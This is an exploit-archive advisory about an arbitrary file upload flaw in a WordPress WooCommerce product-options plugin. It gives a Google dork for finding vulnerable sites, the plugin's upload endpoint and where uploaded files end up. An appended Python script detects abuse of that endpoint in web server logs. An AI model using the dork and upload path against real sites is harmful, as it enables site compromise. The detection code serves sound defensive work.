WordPress Plugins woocommerce-product-options - Arbitrary File Upload


Published: 2017.08.25
Credit: j!h4dDZ
Risk: Medium
CWE: N/A
CVE: N/A
Local: No
Remote: Yes

Dork: inurl:wp-content/plugins/woocommerce-product-options
============================================================================
# Exploit Title: WordPress Plugins woocommerce-product-options - Arbitrary File Upload
# Date: 24/08/017
# Exploit Author: j!h4dDZ
# Tested on: Windows 7
============================================================================
1)---------- Search target with Google Dorking-----------------------------
inurl:wp-content/plugins/woocommerce-product-options
Index of wp-content/plugins/woocommerce-product-options

2)--------------------Exploit the websites---------------------------------
-----------------------File Upload-----------------------------------------
(PoC)
https://localhost/wp-content/plugins/woocommerce-product-options/includes/image-upload.php
------------------------------------------------------------------------------


4) --------------------------Location File:----------------------------------
http://localhost/wp-content/uploads/FILE.jpg

or
http://localhost/wp-content/uploads/tahun/tgl/file.jpg
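
A defender-side check for the two paths named above, as an added example that is not part of the original post: it scans web server access logs for direct POSTs to the plugin's upload script and for follow-up requests under wp-content/uploads/ from the same client. The combined log format, the 10-minute window, the executable-extension list and the sample log lines are assumptions constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Endpoint and upload directory as named in the advisory above.
UPLOAD_ENDPOINT = "/wp-content/plugins/woocommerce-product-options/includes/image-upload.php"
UPLOADS_PREFIX = "/wp-content/uploads/"
# Assumptions: extensions a PHP host may execute, and the correlation window.
EXECUTABLE_EXT = (".php", ".phtml", ".phar")
WINDOW = timedelta(minutes=10)

LOG_RE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

def parse(line):
    """Parse one combined-log-format line; return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    # Query string is dropped and the path lowercased before comparison.
    return m["ip"], ts, m["method"], m["path"].split("?", 1)[0].lower(), int(m["status"])

def find_upload_abuse(lines):
    """Flag direct POSTs to the upload script and follow-up fetches from uploads/."""
    last_post, findings = {}, []  # last_post: client IP -> time of last 2xx POST
    for rec in filter(None, map(parse, lines)):
        ip, ts, method, path, status = rec
        if method == "POST" and path == UPLOAD_ENDPOINT:
            findings.append(("direct_post", ip, path, status))
            if 200 <= status < 300:
                last_post[ip] = ts
        elif path.startswith(UPLOADS_PREFIX) and ip in last_post:
            if timedelta(0) <= ts - last_post[ip] <= WINDOW:
                kind = "script_fetch" if path.endswith(EXECUTABLE_EXT) else "upload_fetch"
                findings.append((kind, ip, path, status))
    return findings

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [24/Aug/2017:10:00:01 +0000] "POST ' + UPLOAD_ENDPOINT + ' HTTP/1.1" 200 312 "-" "-"',
    '203.0.113.7 - - [24/Aug/2017:10:00:09 +0000] "GET /wp-content/uploads/2017/08/a.jpg HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.4 - - [24/Aug/2017:10:01:00 +0000] "GET /wp-content/uploads/2017/08/logo.png HTTP/1.1" 200 900 "-" "-"',
    '203.0.113.7 - - [24/Aug/2017:10:30:00 +0000] "GET /wp-content/uploads/2017/08/a.jpg HTTP/1.1" 200 5120 "-" "-"',
]

if __name__ == "__main__":
    for finding in find_upload_abuse(SAMPLE):
        print(finding)
```

Any `direct_post` finding is worth triage on its own, since the upload script is not meant to be requested outside the plugin's own product pages.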


